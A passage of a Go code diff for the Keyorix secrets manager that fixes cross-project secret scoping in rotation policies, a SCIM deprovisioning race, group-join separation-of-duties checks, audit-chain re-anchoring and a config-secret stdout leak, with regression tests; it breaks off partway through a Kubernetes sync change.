+			return nil, fmt.Errorf("environment %d not found: %w", *req.EnvironmentID, err)
+		}
+		if req.ProjectID != nil && *req.ProjectID != env.ProjectID {
+			return nil, fmt.Errorf("environment %d does not belong to project %d", *req.EnvironmentID, *req.ProjectID)
+		}
+		effectiveProjectID = &env.ProjectID
+	}
+
 	policy := &models.RotationPolicy{
 		Name:            req.Name,
 		Description:     req.Description,
 		Scope:           req.Scope,
-		ProjectID:       req.ProjectID,
+		ProjectID:       effectiveProjectID,
 		EnvironmentID:   req.EnvironmentID,
 		IntervalDays:    req.IntervalDays,
 		AlertDaysBefore: req.AlertDaysBefore,
@@ -203,6 +224,16 @@ func (c *KeyorixCore) scopedPolicySecrets(ctx context.Context, policy *models.Ro
 		// overdue status, backend) for every environment of the project. nil = all envs.
 		environmentID = reqEnvID
 	} else {
+		// Environment-scoped policy: scope by BOTH the environment and its owning
+		// project. EnvironmentID alone is not sufficient — LocalStorage.ListSecrets
+		// only applies its project-ownership JOIN when ProjectID is non-nil, so an
+		// environment-only filter matches every secret with that environment ID
+		// across every project (environment IDs are not globally unique in
+		// intent, just numerically). CreateRotationPolicy always populates
+		// ProjectID from the environment's true owning project, so this is safe
+		// for policies created after that fix; it's a no-op (still environment-
+		// only) for any pre-existing policy whose ProjectID is nil.
+		projectID = policy.ProjectID
 		environmentID = policy.EnvironmentID
 	}
 

--- a/internal/core/rotation_policy_scope_test.go
+++ b/internal/core/rotation_policy_scope_test.go
@@ -1,0 +1,157 @@
+// rotation_policy_scope_test.go — regression coverage for
+// findings-handlers/handlers-rotation-policies-handler.json#0: an
+// environment-scoped rotation policy's secret lookup was not actually confined
+// to its own project, letting it enumerate/rotate a different project's secrets.
+//
+// Two things were broken together:
+//  1. CreateRotationPolicy never checked that a supplied ProjectID/EnvironmentID
+//     pair on a policy actually belong to each other (or derived ProjectID from
+//     the environment when only EnvironmentID was given).
+//  2. scopedPolicySecrets's "environment" scope branch queried ListSecrets with
+//     only EnvironmentID set, leaving ProjectID at its zero value. LocalStorage's
+//     ListSecrets treats a nil ProjectID as "don't filter by project", so the
+//     lookup was effectively unscoped with respect to project ownership.
+package core
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+)
+
+// TestCreateRotationPolicy_EnvironmentProjectMismatchRejected covers fix #1: an
+// actor authorized against their own project (project 1) must not be able to
+// create an "environment-scoped" rotation policy whose EnvironmentID actually
+// belongs to a different project (project 2) they may have no access to.
+func TestCreateRotationPolicy_EnvironmentProjectMismatchRejected(t *testing.T) {
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(&models.SecretNode{}, &models.Environment{}, &models.RotationPolicy{}, &models.AuditEvent{}))
+	now := time.Date(2026, 8, 12, 0, 0, 0, 0, time.UTC)
+	c := &KeyorixCore{storage: store.NewLocalStorage(db), now: func() time.Time { return now }}
+
+	// Project 1 (the attacker's own, legitimate project) and Project 2 (the
+	// victim's), each with an environment. Both environments even share the
+	// same name ("production") — plausible for an attacker to guess/target a
+	// same-looking environment in a project they don't own.
+	require.NoError(t, db.Create(&models.Environment{ID: 10, ProjectID: 1, Name: "production"}).Error)
+	require.NoError(t, db.Create(&models.Environment{ID: 20, ProjectID: 2, Name: "production"}).Error)
+
+	attackerProject := uint(1)
+	victimEnv := uint(20) // belongs to project 2, not project 1
+
+	_, err = c.CreateRotationPolicy(context.Background(), 1, &CreateRotationPolicyRequest{
+		Name: "cross-project", Scope: "environment",
+		ProjectID: &attackerProject, EnvironmentID: &victimEnv,
+		IntervalDays: 90, AlertDaysBefore: 7, CreatedBy: "attacker",
+	})
+	require.Error(t, err, "a policy claiming project 1 but pointing at project 2's environment must be rejected")
+	assert.Contains(t, err.Error(), "does not belong to project")
+
+	// Sanity: no policy row was left behind by the rejected create.
+	var count int64
+	require.NoError(t, db.Model(&models.RotationPolicy{}).Count(&count).Error)
+	assert.Zero(t, count)
+}
+
+// TestCreateRotationPolicy_EnvironmentScopeDerivesProjectID covers the other
+// half of fix #1: when only EnvironmentID is given (ProjectID omitted, which is
+// legal — CreateRotationPolicy only requires ProjectID for scope="project"),
+// the policy's ProjectID must be derived from the environment's true owning
+// project, never left nil. A nil ProjectID on an environment-scoped policy is
+// exactly what let scopedPolicySecrets's environment branch go unscoped.
+func TestCreateRotationPolicy_EnvironmentScopeDerivesProjectID(t *testing.T) {
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(&models.SecretNode{}, &models.Environment{}, &models.RotationPolicy{}, &models.AuditEvent{}))
+	c := &KeyorixCore{storage: store.NewLocalStorage(db), now: func() time.Time { return time.Now() }}
+
+	require.NoError(t, db.Create(&models.Environment{ID: 20, ProjectID: 2, Name: "production"}).Error)
+	envID := uint(20)
+
+	p, err := c.CreateRotationPolicy(context.Background(), 1, &CreateRotationPolicyRequest{
+		Name: "env-only", Scope: "environment",
+		EnvironmentID: &envID,
+		IntervalDays:  90, AlertDaysBefore: 7, CreatedBy: "admin",
+	})
+	require.NoError(t, err)
+	require.NotNil(t, p.ProjectID)
+	assert.Equal(t, uint(2), *p.ProjectID, "ProjectID must be derived from the environment's true owning project")
+}
+
+// TestScopedPolicySecrets_EnvironmentScopeDoesNotLeakAcrossProjects is the
+// storage-level regression for fix #2, exercised directly against
+// scopedPolicySecrets so it also covers a mismatched/legacy policy row that
+// didn't go through CreateRotationPolicy's validation (e.g. pre-existing data
+// from before this fix). Two projects each get an environment named the same
+// way, and secrets of their own; a policy is inserted claiming project 1 but
+// scoped (via EnvironmentID) to project 2's environment. The secret lookup must
+// never surface project 2's secrets.
+func TestScopedPolicySecrets_EnvironmentScopeDoesNotLeakAcrossProjects(t *testing.T) {
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(&models.SecretNode{}, &models.Environment{}, &models.RotationPolicy{}))
+	c := &KeyorixCore{storage: store.NewLocalStorage(db)}
+
+	require.NoError(t, db.Create(&models.Environment{ID: 10, ProjectID: 1, Name: "production"}).Error)
+	require.NoError(t, db.Create(&models.Environment{ID: 20, ProjectID: 2, Name: "production"}).Error)
+
+	require.NoError(t, db.Create(&models.SecretNode{ProjectID: 1, EnvironmentID: 10, Name: "own-secret", Type: "password"}).Error)
+	require.NoError(t, db.Create(&models.SecretNode{ProjectID: 2, EnvironmentID: 20, Name: "victim-secret", Type: "password"}).Error)
+
+	attackerProject := uint(1)
+	victimEnv := uint(20) // belongs to project 2
+	policy := &models.RotationPolicy{
+		Name: "cross-project", Scope: "environment",
+		ProjectID: &attackerProject, EnvironmentID: &victimEnv,
+		IntervalDays: 90, AlertDaysBefore: 7, IsActive: true, CreatedBy: "attacker",
+	}
+	require.NoError(t, db.Create(policy).Error)
+
+	secrets, err := c.scopedPolicySecrets(context.Background(), policy, nil)
+	require.NoError(t, err)
+	for _, s := range secrets {
+		assert.Equal(t, uint(1), s.ProjectID, "a policy claiming project 1 must never surface project 2's secrets")
+	}
+	assert.Empty(t, secrets, "a mismatched project/environment pair must yield no secrets, not the other project's")
+}
+
+// TestScopedPolicySecrets_EnvironmentScopeMatchesOwnProject is the positive
+// counterpart: a correctly-scoped environment policy (ProjectID derived from
+// its own environment, as CreateRotationPolicy now guarantees) must still see
+// its own project's secrets in that environment.
+func TestScopedPolicySecrets_EnvironmentScopeMatchesOwnProject(t *testing.T) {
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(&models.SecretNode{}, &models.Environment{}, &models.RotationPolicy{}))
+	c := &KeyorixCore{storage: store.NewLocalStorage(db)}
+
+	require.NoError(t, db.Create(&models.Environment{ID: 10, ProjectID: 1, Name: "production"}).Error)
+	require.NoError(t, db.Create(&models.Environment{ID: 20, ProjectID: 2, Name: "production"}).Error)
+
+	require.NoError(t, db.Create(&models.SecretNode{ProjectID: 1, EnvironmentID: 10, Name: "own-secret", Type: "password"}).Error)
+	require.NoError(t, db.Create(&models.SecretNode{ProjectID: 2, EnvironmentID: 20, Name: "victim-secret", Type: "password"}).Error)
+
+	ownProject := uint(1)
+	ownEnv := uint(10)
+	policy := &models.RotationPolicy{
+		Name: "correctly-scoped", Scope: "environment",
+		ProjectID: &ownProject, EnvironmentID: &ownEnv,
+		IntervalDays: 90, AlertDaysBefore: 7, IsActive: true, CreatedBy: "admin",
+	}
+	require.NoError(t, db.Create(policy).Error)
+
+	secrets, err := c.scopedPolicySecrets(context.Background(), policy, nil)
+	require.NoError(t, err)
+	require.Len(t, secrets, 1)
+	assert.Equal(t, "own-secret", secrets[0].Name)
+	assert.Equal(t, uint(1), secrets[0].ProjectID)
+}

--- a/internal/core/scim.go
+++ b/internal/core/scim.go
@@ -453,11 +453,14 @@ func (c *KeyorixCore) guardLastAdminDeactivation(ctx context.Context, targetID u
 // isn't SCIM-managed (scimManaged) — a valid SCIM token must not be able to
 // deprovision an arbitrary native account it never provisioned.
 func (c *KeyorixCore) DeprovisionSCIMUser(ctx context.Context, actorID, id uint) error {
-	user, err := c.storage.GetUser(ctx, id)
+	// Best-effort pre-check only (matching UpdateSCIMUser's identical pre-fetch, #120):
+	// the authoritative scimManaged decision is re-made below against the fresh,
+	// lock-guarded read inside the transaction, not this struct.
+	precheck, err := c.storage.GetUser(ctx, id)
 	if err != nil {
 		return fmt.Errorf("%s: %w", i18n.T("ErrorUserNotFound", nil), err)
 	}
-	if !scimManaged(user) {
+	if !scimManaged(precheck) {
 		return fmt.Errorf("%s: not a SCIM-managed account", i18n.T("ErrorUserNotFound", nil))
 	}
 	// #G03: guardLastAdminDeactivation's read is serialized against every other
@@ -471,30 +474,75 @@ func (c *KeyorixCore) DeprovisionSCIMUser(ctx context.Context, actorID, id uint)
 	if err := c.guardLastAdminDeactivation(ctx, id); err != nil {
 		return err
 	}
-	user.IsActive = false
-	// Mark as SCIM-deprovisioned rather than admin-suspended, but never downgrade an
-	// existing admin security suspension. The user is soft-deleted below regardless,
-	// so this only affects the state on the recoverable record.
-	if NormalizeAccountState(user.AccountState) != AccountSuspended {
-		user.AccountState = AccountDeprovisioned
-	}
-	user.UpdatedAt = c.now()
 	// Capture the user's session-token hashes BEFORE the transaction so they can be
 	// evicted from the auth cache after commit (the stored token is the SHA-256 cache key).
 	sessionHashes, _ := c.storage.ListSessionTokenHashesForUser(ctx, id)
+	var username string
 	// Suspend + terminate sessions + soft-delete atomically: a SCIM DELETE either fully
 	// deprovisions or leaves the account untouched, so a mid-way storage failure can't
 	// leave it half-deprovisioned (suspended but not deleted), which would make retries
 	// non-idempotent.
 	if err := c.storage.WithTransaction(ctx, func(tx storage.Storage) error {
-		if _, err := tx.UpdateUser(ctx, user); err != nil {
+		// Re-read the row via a locked read INSIDE the transaction, immediately before
+		// the write, instead of reusing the struct captured by the unlocked GetUser
+		// above — a concurrent state-changing write (e.g. SuspendUser, or another
+		// accountStateMu-guarded action that landed between that read and here) would
+		// otherwise be silently clobbered by a blind write of the stale struct.
+		// Mirrors scimUpdateUserTx/setAccountState's locked-read-then-selective-write
+		// pattern (both in this package) rather than scimUpdateUserTx's own #G42
+		// caveat: everything from here to the write below runs while accountStateMu is
+		// still held, so this fresh read can't itself go stale before it's persisted.
+		user, err := tx.LockUserForUpdate(ctx, id)
+		if err != nil {
 			return err
+		}
+		if !scimManaged(user) {
+			return storage.ErrUserNotFound
+		}
+		username = user.Username
+		origState := user.AccountState
+		wasActive := user.IsActive
+		user.IsActive = false
+		// Mark as SCIM-deprovisioned rather than admin-suspended, but never downgrade an
+		// existing admin security suspension — evaluated against the FRESH state so a
+		// suspension that committed after the pre-check above isn't lost. The user is
+		// soft-deleted below regardless, so this only affects the state on the
+		// recoverable record.
+		if NormalizeAccountState(user.AccountState) != AccountSuspended {
+			user.AccountState = AccountDeprovisioned
+		}
+		user.UpdatedAt = c.now()
+		if user.AccountState != origState {
+			// #454: persist the state transition via the narrow column-only write (not
+			// folded into the full-row write below) so it also lands under
+			// storage.type: remote, which can't express account_state in the generic
+			// UpdateUser wire format. See SetAccountState's doc comment.
+			if err := tx.SetAccountState(ctx, id, user.AccountState, user.UpdatedAt); err != nil {
+				return err
+			}
+		}
+		// Persist IsActive (and the rest of the now-fresh row) via the same conditional
+		// write every other IsActive-flipping path in this package uses, rather than a
+		// blind tx.UpdateUser: succeeds only if the row's current is_active still
+		// matches wasActive, which — since user was just read under LockUserForUpdate
+		// while accountStateMu is held — should always hold true here; a false match
+		// means a non-accountStateMu-guarded write raced in, and must surface as a
+		// conflict rather than being silently overwritten or retried.
+		matched, err := tx.UpdateUserIfActiveStateMatches(ctx, user, wasActive)
+		if err != nil {
+			return err
+		}
+		if !matched {
+			return fmt.Errorf("user %d: %w", id, ErrUserActiveStateConflict)
 		}
 		if err := tx.DeleteSessionsForUserExcept(ctx, id, 0); err != nil {
 			return err
 		}
 		return tx.DeleteUser(ctx, id)
 	}); err != nil {
+		if errors.Is(err, storage.ErrUserNotFound) {
+			return fmt.Errorf("%s: not a SCIM-managed account", i18n.T("ErrorUserNotFound", nil))
+		}
 		return fmt.Errorf("%s: %w", i18n.T("ErrorStorageFailed", nil), err)
 	}
 	// Evict the terminated sessions from the auth cache AFTER commit, so a deprovisioned
@@ -502,7 +550,7 @@ func (c *KeyorixCore) DeprovisionSCIMUser(ctx context.Context, actorID, id uint)
 	// lingering for the cache TTL.
 	c.invalidateTokenCache(sessionHashes...)
 	c.writeAuditEvent(ctx, EventSCIMUserDeprovisioned, actorPtr(actorID), nil,
-		fmt.Sprintf("SCIM deprovisioned user %d (%s)", id, user.Username))
+		fmt.Sprintf("SCIM deprovisioned user %d (%s)", id, username))
 	return nil
 }
 

--- a/internal/core/sod.go
+++ b/internal/core/sod.go
@@ -642,3 +642,77 @@ func (c *KeyorixCore) requireGrantSetNoSoDViolation(ctx context.Context, roleIDs
 	}
 	return nil
 }
+
+// requireGroupJoinNoSoDViolation is requireNoSoDViolation's GROUP-JOIN
+// counterpart (AUTHZ-007 / #G05): joining a group confers EVERY role the
+// group holds at once, so the permissions a new member gains are a SET
+// landing atomically — not a sequence of independent single-role grants. A
+// per-role loop, where each iteration re-queries the user's CURRENT held
+// permissions fresh from storage, structurally cannot see a violation that
+// only exists because two of the group's OWN roles combine with each other:
+// neither role's individual permission set, checked against what the user
+// held BEFORE this join, ever includes the other new role's permissions in
+// the same pass. (Confirmed empirically: two roles X and Y granted together
+// by one group, {X, Y} a forbidden policy pair, held by neither the user nor
+// either role alone, sailed straight through the old per-grant
+// requireNoSoDViolation loop.)
+//
+// This mirrors requireGrantSetNoSoDViolation's "evaluate the whole set
+// together" shape, but — unlike that function, which is for a brand-new
+// principal with NO prior grants to weigh against — this principal already
+// exists, so "held" starts from their actual current permissions
+// (userHeldPermissionSet, exactly as requireNoSoDViolation uses), and
+// "adding" is the union of every permission ALL of the group's role grants
+// would confer, checked together in one pass. Any role in the set that is
+// itself admin-bypass exempts the whole join (see package doc above — a
+// member who would gain admin-bypass through this join trivially "violates"
+// every policy already, same carve-out requireGrantSetNoSoDViolation makes).
+func (c *KeyorixCore) requireGroupJoinNoSoDViolation(ctx context.Context, userID uint, grants []storage.RoleAssignment) error {
+	// A group with no role grants confers nothing, so there is nothing to
+	// evaluate — return before touching storage at all. This matches the old
+	// per-role loop's behavior (an empty grants slice meant its body, and thus
+	// every storage call inside it, never ran) and keeps a plain, role-less
+	// group join working in callers/tests that never provision the
+	// sod_policies table.
+	if len(grants) == 0 {
+		return nil
+	}
+	policies, err := c.storage.ListSoDPolicies(ctx)
+	if err != nil {
+		return fmt.Errorf("failed to evaluate separation-of-duties policy: %w", err)
+	}
+	if len(policies) == 0 {
+		return nil
+	}
+	if c.isGlobalAdminRoleName(ctx, userID) != "" {
+		return nil // already holds admin-bypass — see package doc above
+	}
+	adding := make(map[string]bool)
+	for _, g := range grants {
+		role, err := c.storage.GetRole(ctx, g.RoleID)
+		if err != nil {
+			continue // mirrors validateGroupJoinRoles' existing "skip roles whose definition cannot be loaded"
+		}
+		if isAdminRoleName(role.Name) {
+			return nil // this join grants admin-bypass — see package doc above
+		}
+		perms, err := c.rolePermissionNameSet(ctx, g.RoleID)
+		if err != nil {
+			return fmt.Errorf("failed to evaluate separation-of-duties policy: %w", err)
+		}
+		for name := range perms {
+			adding[name] = true
+		}
+	}
+	if len(adding) == 0 {
+		return nil
+	}
+	held, err := c.userHeldPermissionSet(ctx, userID)
+	if err != nil {
+		return fmt.Errorf("failed to evaluate separation-of-duties policy: %w", err)
+	}
+	if pol := sodPolicyNewlyCompletedBy(policies, held, adding); pol != nil {
+		return sodBlockedErr(pol, "join this group")
+	}
+	return nil
+}

--- a/internal/core/storage/interface.go
+++ b/internal/core/storage/interface.go
@@ -1105,13 +1105,15 @@ type Storage interface {
 	// bound rather than a narrow live-window one.
 	PrincipalSecretFirstSeen(ctx context.Context, since time.Time) (map[string]map[uint]time.Time, error)
 	// MostAccessedSecrets returns the most-read secrets (optionally scoped to a
-	// project) in the window since `since`, ordered by read count descending,
-	// capped at `limit`. Backs the usage-analytics dashboard.
-	MostAccessedSecrets(ctx context.Context, projectID *uint, since time.Time, limit int) ([]SecretUsageStat, error)
-	// UnusedSecrets returns secrets (optionally scoped to a project) with no read
-	// access since `notReadSince` — including never-read secrets — ordered
-	// never-read first, then oldest last read.
-	UnusedSecrets(ctx context.Context, projectID *uint, notReadSince time.Time) ([]UnusedSecretStat, error)
+	// project and, further, to a single environment within it) in the window
+	// since `since`, ordered by read count descending, capped at `limit`. Backs
+	// the usage-analytics dashboard.
+	MostAccessedSecrets(ctx context.Context, projectID, environmentID *uint, since time.Time, limit int) ([]SecretUsageStat, error)
+	// UnusedSecrets returns secrets (optionally scoped to a project and, further,
+	// to a single environment within it) with no read access since
+	// `notReadSince` — including never-read secrets — ordered never-read first,
+	// then oldest last read.
+	UnusedSecrets(ctx context.Context, projectID, environmentID *uint, notReadSince time.Time) ([]UnusedSecretStat, error)
 	// CountUnusedSecretsByProject returns, for every project in projectIDs in a
 	// single grouped query, the count of secrets not read since notReadSince (or
 	// never read) — the deployment-wide counterpart to UnusedSecrets, used by the

--- a/internal/core/storage/interface.go
+++ b/internal/core/storage/interface.go
@@ -1147,14 +1147,28 @@ type Storage interface {
 	// table.
 	AuditRetentionStats(ctx context.Context) (*AuditRetentionStats, error)
 	// DeleteAuditLogsBefore hard-deletes AuditEvent rows with created_at < cutoff.
-	// Returns the number of rows deleted.
-	DeleteAuditLogsBefore(ctx context.Context, cutoff time.Time) (int64, error)
+	// Returns the number of rows deleted, plus a re-anchor candidate when the
+	// delete reached into the chained (post-ADR-029) region: the new earliest
+	// surviving row's id/prev_hash/entry_hash, for the caller to authenticate
+	// (HMAC, checkpoint signing key) and persist as the retention anchor BEFORE
+	// VerifyAuditChain can walk the surviving chain again — nil when nothing
+	// chained was deleted (nothing to re-anchor). See AuditChainAnchor.
+	DeleteAuditLogsBefore(ctx context.Context, cutoff time.Time) (int64, *AuditChainAnchor, error)
 	// VerifyAuditChain re-walks the tamper-evidence hash chain (ADR-029) over
 	// audit_events and reports whether it is intact. The first divergence —
 	// modified field, deleted/inserted row, or broken linkage — is reported
 	// with the offending event id. A leading run of pre-ADR-029 rows with empty
 	// hashes is counted as an unchained legacy prefix, not a failure.
-	VerifyAuditChain(ctx context.Context) (*AuditChainVerification, error)
+	//
+	// anchor, when non-nil, seeds the walk at a legitimately-moved chain start
+	// (a retention purge removed the original earliest rows) instead of
+	// requiring the true genesis: the earliest surviving row must match
+	// anchor.RowID/PrevHash/EntryHash exactly, or the chain is reported broken.
+	// The caller MUST have already authenticated anchor (this layer trusts it
+	// literally); pass nil to verify from genesis as before. A surviving chain
+	// that already starts at genesis (the purge only removed the legacy
+	// unchained prefix, or the table is now empty) ignores a non-nil anchor.
+	VerifyAuditChain(ctx context.Context, anchor *AuditChainAnchor) (*AuditChainVerification, error)
 	// CreateAuditCheckpoint appends a signed checkpoint of the chain head (ADR-029).
 	CreateAuditCheckpoint(ctx context.Context, cp *models.AuditCheckpoint) error
 	// UpdateAuditCheckpointAnchor stores the external-notary anchor (RFC 3161 token,
@@ -1826,6 +1840,23 @@ type AuditChainVerification struct {
 	AnchorToken    []byte
 	AnchoredAt     *time.Time
 	AnchorProvider string
+}
+
+// AuditChainAnchor is an authenticated re-anchor point for VerifyAuditChain's
+// walk, produced when a retention purge (DeleteAuditLogsBefore) removes rows
+// from the chained (post-ADR-029) region: the new earliest surviving row's own
+// id, prev_hash (which now points at a deleted predecessor), and entry_hash.
+//
+// The store layer that walks the chain has no signing key and trusts this
+// value literally — authenticating it (HMAC-signing at write time under the
+// checkpoint signing key, verifying the signature before ever constructing one
+// to pass in) is entirely the caller's (core layer's) responsibility. Without
+// that, any DB-writable actor could forge an anchor claiming an arbitrary gap
+// is sanctioned, defeating the tamper-evidence the chain exists to provide.
+type AuditChainAnchor struct {
+	RowID     uint
+	PrevHash  string
+	EntryHash string
 }
 
 // UnusedSecretStat is one row of the unused-secrets report. LastRead is nil when

--- a/internal/core/usage_analytics.go
+++ b/internal/core/usage_analytics.go
@@ -18,9 +18,13 @@ const (
 )
 
 // MostAccessedSecrets returns the most-read secrets (optionally scoped to a
-// project) over the last `days` (default 30), capped at `limit` (default 10,
-// max 100). Backs the usage-analytics dashboard's "most accessed" ranking.
-func (c *KeyorixCore) MostAccessedSecrets(ctx context.Context, projectID *uint, days, limit int) ([]storage.SecretUsageStat, error) {
+// project and, further, to a single environment within it) over the last
+// `days` (default 30), capped at `limit` (default 10, max 100). Backs the
+// usage-analytics dashboard's "most accessed" ranking. environmentID mirrors
+// the {project, environment} scope the HTTP route authorizes against
+// (ScopeFromQuery) — when supplied, the result is confined to that
+// environment instead of aggregating across the whole project.
+func (c *KeyorixCore) MostAccessedSecrets(ctx context.Context, projectID, environmentID *uint, days, limit int) ([]storage.SecretUsageStat, error) {
 	if days <= 0 {
 		days = defaultUsageWindowDays
 	}
@@ -34,17 +38,21 @@ func (c *KeyorixCore) MostAccessedSecrets(ctx context.Context, projectID *uint, 
 		limit = maxMostAccessedLimit
 	}
 	since := c.now().AddDate(0, 0, -days)
-	stats, err := c.storage.MostAccessedSecrets(ctx, projectID, since, limit)
+	stats, err := c.storage.MostAccessedSecrets(ctx, projectID, environmentID, since, limit)
 	if err != nil {
 		return nil, fmt.Errorf("failed to compute most-accessed secrets: %w", err)
 	}
 	return stats, nil
 }
 
-// UnusedSecrets returns secrets (optionally scoped to a project) with no read
-// in the last `days` (default 30), including never-read secrets. Powers the
-// "find & retire dead secrets" view.
-func (c *KeyorixCore) UnusedSecrets(ctx context.Context, projectID *uint, days int) ([]storage.UnusedSecretStat, error) {
+// UnusedSecrets returns secrets (optionally scoped to a project and, further,
+// to a single environment within it) with no read in the last `days`
+// (default 30), including never-read secrets. Powers the "find & retire dead
+// secrets" view. environmentID mirrors the {project, environment} scope the
+// HTTP route authorizes against (ScopeFromQuery) — when supplied, the result
+// is confined to that environment instead of aggregating across the whole
+// project.
+func (c *KeyorixCore) UnusedSecrets(ctx context.Context, projectID, environmentID *uint, days int) ([]storage.UnusedSecretStat, error) {
 	if days <= 0 {
 		days = defaultUsageWindowDays
 	}
@@ -52,7 +60,7 @@ func (c *KeyorixCore) UnusedSecrets(ctx context.Context, projectID *uint, days i
 		days = maxUsageWindowDays
 	}
 	cutoff := c.now().AddDate(0, 0, -days)
-	stats, err := c.storage.UnusedSecrets(ctx, projectID, cutoff)
+	stats, err := c.storage.UnusedSecrets(ctx, projectID, environmentID, cutoff)
 	if err != nil {
 		return nil, fmt.Errorf("failed to compute unused secrets: %w", err)
 	}

--- a/internal/di/di_stdout_leak_test.go
+++ b/internal/di/di_stdout_leak_test.go
@@ -1,0 +1,80 @@
+package di
+
+import (
+	"bytes"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// sentinelDBPassword is a recognizable value that must never appear on
+// InitializeApp's stdout output. If this constant ever shows up in captured
+// output, the loaded *config.Config (or some field of it carrying a live
+// secret) is being printed somewhere in the init path — see the security
+// note on InitializeApp in wire.go.
+const sentinelDBPassword = "S3ntinel-Do-Not-Leak-9f3ac21c"
+
+// TestInitializeApp_DoesNotLeakConfigSecretsToStdout is a regression test for
+// a HIGH-severity finding: InitializeApp used to do
+// fmt.Println("Config successfully loaded:", conf), printing the entire
+// loaded *config.Config value — including live secrets such as
+// storage.database.password — to stdout. stdout is routinely captured by
+// container/systemd/CI log pipelines that have far broader read access than
+// the config file itself, so every process start leaked every secret
+// embedded in config.
+//
+// This test writes a keyorix.yaml containing a recognizable sentinel value in
+// storage.database.password, captures everything InitializeApp writes to
+// os.Stdout, and asserts the sentinel never appears in that output.
+func TestInitializeApp_DoesNotLeakConfigSecretsToStdout(t *testing.T) {
+	dir := t.TempDir()
+	t.Cleanup(restoreWD(t))
+
+	cfgYAML := `
+storage:
+  database:
+    password: "` + sentinelDBPassword + `"
+`
+	cfgPath := filepath.Join(dir, "keyorix.yaml")
+	require.NoError(t, os.WriteFile(cfgPath, []byte(cfgYAML), 0o600))
+	require.NoError(t, os.Chdir(dir))
+
+	output := captureStdout(t, func() {
+		result, err := InitializeApp()
+		require.NoError(t, err, "InitializeApp must succeed with a valid keyorix.yaml")
+		assert.NotEmpty(t, result)
+	})
+
+	assert.NotContains(t, output, sentinelDBPassword,
+		"InitializeApp must never print secret config values (e.g. storage.database.password) to stdout")
+	assert.False(t, strings.Contains(output, "Password"),
+		"InitializeApp's stdout output should not include a serialized Config struct field dump")
+}
+
+// captureStdout redirects os.Stdout for the duration of fn and returns
+// everything written to it. fn runs synchronously; os.Stdout is restored
+// before captureStdout returns (including on failure/panic).
+func captureStdout(t *testing.T, fn func()) string {
+	t.Helper()
+
+	origStdout := os.Stdout
+	r, w, err := os.Pipe()
+	require.NoError(t, err, "failed to create pipe for stdout capture")
+	os.Stdout = w
+	defer func() {
+		os.Stdout = origStdout
+	}()
+
+	fn()
+
+	require.NoError(t, w.Close())
+	var buf bytes.Buffer
+	_, err = io.Copy(&buf, r)
+	require.NoError(t, err, "failed to read captured stdout")
+	return buf.String()
+}

--- a/internal/di/wire.go
+++ b/internal/di/wire.go
@@ -8,11 +8,16 @@ import (
 
 func InitializeApp() (string, error) {
 	fmt.Println("InitializeApp() called")
-	conf, err := config.Load("keyorix.yaml")
+	_, err := config.Load("keyorix.yaml")
 	if err != nil {
 		fmt.Println("Error loading config:", err)
 		return "", err
 	}
-	fmt.Println("Config successfully loaded:", conf)
+	// Do not log the loaded *config.Config value: it embeds live secrets
+	// (DB password, remote/SIEM/webhook API tokens, SMTP password, KMS/Shamir
+	// key material, etc. — see internal/config.Config) that would otherwise
+	// leak into stdout, which is commonly captured by container/systemd/CI log
+	// pipelines with far broader read access than the config file itself.
+	fmt.Println("Config successfully loaded")
 	return "✅ Keyorix app initialized. DB migrated.", nil
 }

--- a/internal/k8ssync/sync.go
+++ b/internal/k8ssync/sync.go
@@ -87,9 +87,15 @@ func (t target) String() string { return t.namespace + "/" + t.name }
 
 // Reconcile groups the mappings by target Secret, fetches each referenced value,
 // and creates/updates the Secret only when its desired data differs from what's
-// already there. A fetch or apply failure for one target is recorded and skipped —
-// it never aborts the pass or writes a partial Secret — so other targets still sync.
-// The returned Result tallies the outcome.
+// already there. A TRANSIENT fetch or apply failure for one target is recorded and
+// skipped — it never aborts the pass or writes a partial Secret — so other targets
+// still sync unaffected. A DEFINITIVE per-key failure (ErrUpstreamGone: the upstream
+// secret was deleted, or this agent's access to it was revoked) instead drops only
+// that one key and applies the Secret with its remaining, still-valid keys — or
+// removes the Secret entirely if none are left — so one revoked key in a Secret
+// backed by several mappings never collaterally wipes out unrelated live keys
+// (G05). See buildDesired for the fetch-time split between the two cases. The
+// returned Result tallies the outcome.
 func (e *Engine) Reconcile(ctx context.Context, mappings []SecretMapping) (Result, error) { // NOSONAR -- cognitive complexity 31, suppress go:S3776
 	var res Result
 
@@ -105,32 +111,48 @@ func (e *Engine) Reconcile(ctx context.Context, mappings []SecretMapping) (Resul
 	sort.Slice(targets, func(i, j int) bool { return targets[i].String() < targets[j].String() })
 
 	for _, t := range targets {
-		desired, ferr := e.buildDesired(ctx, grouped[t])
+		desired, revokedRefs, ferr := e.buildDesired(ctx, grouped[t])
 		if ferr != nil {
-			// #140: a DEFINITIVE failure (the upstream secret was deleted, or this
-			// agent's access to it was revoked — 404/401/403, never a transient
-			// network/5xx error) must propagate to the cluster: the materialized
-			// Secret is actively removed rather than left at its last-known,
-			// possibly-compromised or now-unauthorized value indefinitely (the
-			// prior behavior — skip and retry next pass — never converges, since
-			// the SAME definitive failure recurs every pass). A transient failure
-			// still just skips this pass and retries next time, unchanged.
-			if errors.Is(ferr, ErrUpstreamGone) {
-				res.Errors = append(res.Errors, fmt.Sprintf("%s: upstream secret gone or access revoked, removing stale value: %v", t, ferr))
-				if e.dryRun {
-					res.Revoked++
-					continue
-				}
-				if derr := e.sink.Delete(ctx, t.namespace, t.name); derr != nil {
-					res.Failed++
-					res.Errors = append(res.Errors, fmt.Sprintf("%s: failed to remove revoked secret: %v", t, derr))
-					continue
-				}
+			// A TRANSIENT failure (network/5xx — never ErrUpstreamGone, see
